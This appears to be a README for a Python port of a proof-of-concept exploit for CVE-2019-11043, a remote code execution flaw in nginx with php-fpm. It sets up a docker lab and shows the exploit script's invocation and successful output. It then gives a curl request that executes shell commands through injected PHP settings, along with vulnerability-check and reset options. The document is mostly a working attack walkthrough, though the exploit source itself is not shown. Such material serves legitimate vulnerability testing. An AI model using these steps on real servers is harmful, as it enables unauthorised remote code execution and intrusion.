PoC CVE-2019-11043
A Python port of the CVE-2019-11043 exploit by @neex: https://github.com/neex/phuip-fpizdam
This PoC is still a draft; for real testing, use the original exploit written by @neex.
Vulnerability Analysis: https://paper.seebug.org/1064/
PoC Setup
Just run docker-compose to bring up the nginx and php-fpm containers:
# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php ... done
Creating nginx ... done
If you want to follow the php-fpm logs, run:
docker logs --tail 10 --follow php
Exploit
# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!
After a successful run, you should be able to execute commands through the injected settings, e.g.:
curl http://localhost/index.php?a=bin/ls+/
If you only want to check whether the target is vulnerable, skipping the RCE step:
python3 exploit.py --url http://localhost/index.php --skip-rce
To kill the php-fpm process and reset all injected PHP settings, use --reset:
python3 exploit.py --url http://localhost/index.php --reset
Video PoC
https://twitter.com/Menin_TheMiddle/status/1188776386569355265